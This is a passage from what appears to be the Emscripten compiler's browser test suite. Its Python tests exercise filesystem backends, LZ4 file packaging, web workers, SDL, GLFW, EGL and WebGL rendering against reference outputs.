self.btest(test_file('fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-s', 'ASYNCIFY', '-s', 'EXIT_RUNTIME']
secret = str(time.time())
self.btest(test_file('fs', 'test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(test_file('fs', 'test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc; -s LZ4=1 tells emcc to have the file packager use LZ4
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([test_file('fs', 'test_lz4fs.cpp'), '--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-s', 'MODULARIZE=1'])
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
# non-lz4 for comparison:
# try:
#   os.mkdir('files')
# except OSError:
#   pass
# shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
# shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
# shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
# out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
# open('files.js', 'wb').write(out)
# self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(test_file('idbstore.c'), str(stage), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-s', 'ASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync_worker.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB', '-s', 'ASYNCIFY'])
def test_force_exit(self):
self.btest('force_exit.c', expected='17', args=['-s', 'EXIT_RUNTIME'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify=0', '--shell-file',
test_file('sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.compile_btest([test_file('test_egl.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.compile_btest([test_file('test_egl_width_height.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
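# Build the worker twice: once with a preloaded data file and once without.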
for file_data in [1, 0]:
cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. test_file('hello_world_gles.c')
self.compile_btest([test_file(c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid a race condition on cleanup: wait a bit so that processes have released their file locks and test tearDown
# won't attempt to rmdir() files that are still in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS'])
@requires_graphics_hardware
def test_glgears_long(self):
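# The reported value varies between runs, so accept anything in the range [15, 500).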
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([test_file('hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING', '-lGL', '-lglut',
'--shell-file', test_file('hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-s', 'GL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
with open('test.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return test_file('glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(test_file('glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(test_file('glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(test_file('glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + test_file('glbook', 'Common'),
test_file('glbook', 'Common', 'esUtil.c'),
test_file('glbook', 'Common', 'esShader.c'),
test_file('glbook', 'Common', 'esShapes.c'),
test_file('glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=_main,_third', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_file('script1.js', '''
Module._set(456);
''')
create_file('file1.txt', 'first')
create_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=_main,_set', '-s', 'FORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=_main,_set', '-s', 'FORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'EXIT_RUNTIME']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker_exit(self):
# Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The
# app should still stay alive until the loop ends
self.btest_exit('emscripten_main_loop_and_blocker.cpp', 0)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
  # Covered by the dEQP test suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-s', 'RELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
